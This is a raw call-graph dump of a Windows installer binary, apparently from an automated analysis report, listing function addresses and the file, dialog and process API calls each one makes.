405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 
3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf 
ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 
3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 
3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 
3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 
3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 
4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 
4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 
403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 
405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 
4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 
4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d 
